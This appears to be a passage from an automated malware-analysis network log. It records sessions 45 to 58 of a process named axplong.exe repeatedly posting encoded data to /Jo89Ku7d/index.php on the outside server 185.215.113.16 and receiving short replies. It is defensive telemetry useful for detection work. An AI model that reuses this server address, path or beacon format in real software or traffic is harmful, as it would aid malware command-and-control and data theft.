Sep 27, 2024 07:02:52.685580969 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.8	49757	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:52.796557903 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:53.515979052 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:53.562483072 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:53.793876886 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.8	49758	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:53.903774977 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:54.592211962 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:54.593456984 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:54.815093040 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.8	49759	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:54.937334061 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:55.627449036 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:55.628256083 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:55.850049973 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.8	49760	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:55.965049982 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:56.694044113 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:56.772474051 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:57.007092953 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.8	49761	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:57.121422052 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:57.829888105 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:57.830708027 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:58.077756882 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.8	49762	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:58.199486017 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:58.901690960 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:58.905006886 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:02:59.132129908 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.8	49763	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:02:59.251188993 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:02:59.955395937 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:02:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:02:59.958581924 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:03:00.189183950 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.8	49764	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:03:00.308712959 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:03:01.015784025 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:03:01.016632080 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:03:01.248519897 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.8	49765	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:03:01.355509996 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:03:02.077279091 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:03:02.077987909 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:03:02.307926893 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.8	49766	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:03:02.480050087 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:03:03.109131098 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:03:03.109956980 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:03:03.339112997 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.8	49767	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:03:03.455001116 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:03:04.155088902 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:03:04.156084061 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:03:04.383002996 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.8	49768	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:03:04.496404886 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:03:05.223476887 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 27, 2024 07:03:05.224349022 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 31 41 31 34 45 43 45 46 32 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7F1A14ECEF2FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Sep 27, 2024 07:03:05.460809946 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.8	49769	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 07:03:05.578154087 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 27, 2024 07:03:06.305886030 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Sep 2024 05:03:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.8	49770	185.215.113.16	80	5760	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

